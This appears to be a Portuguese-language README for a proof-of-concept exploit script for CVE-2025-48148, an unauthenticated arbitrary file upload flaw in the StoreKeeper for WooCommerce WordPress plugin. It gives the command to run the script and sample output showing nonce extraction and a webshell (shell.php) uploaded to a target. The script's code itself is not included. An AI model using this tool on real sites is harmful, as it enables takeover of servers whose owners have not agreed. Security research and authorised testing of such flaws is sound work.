
StoreKeeper for WooCommerce <= 14.4.4 - Upload Arbitrário de Arquivos Não Autenticado
StoreKeeper for WooCommerce <= 14.4.4 - Upload Arbitrário de Arquivo Não Autenticado
O plugin StoreKeeper for WooCommerce para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo em todas as versões até, e incluindo, 14.4.4.
Isso permite que atacantes não autenticados enviem arquivos arbitrários para o servidor do site afetado, potencialmente levando à execução remota de código.
Nome do Script: CVE-2025-48148.py
Este script é um exploit profissional de prova de conceito para CVE-2025-48148, projetado para automatizar o processo de upload de um webshell em sites WordPress vulneráveis que utilizam o plugin StoreKeeper for WooCommerce.
nonce diretamente da URL alvo, garantindo confiabilidade mesmo se o valor mudar.python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
Flags opcionais:
--debug Ativa a saída detalhada.--insecure Ignora a verificação de certificado SSL.Exemplo:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 E-mail: [email protected]
📨 Telegram: @Kxploit
Este script é fornecido apenas para fins educacionais e de testes de penetração autorizados.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Sempre obtenha permissão adequada antes de testar qualquer sistema.
Por: Nxploited ( Khaled Alenazi )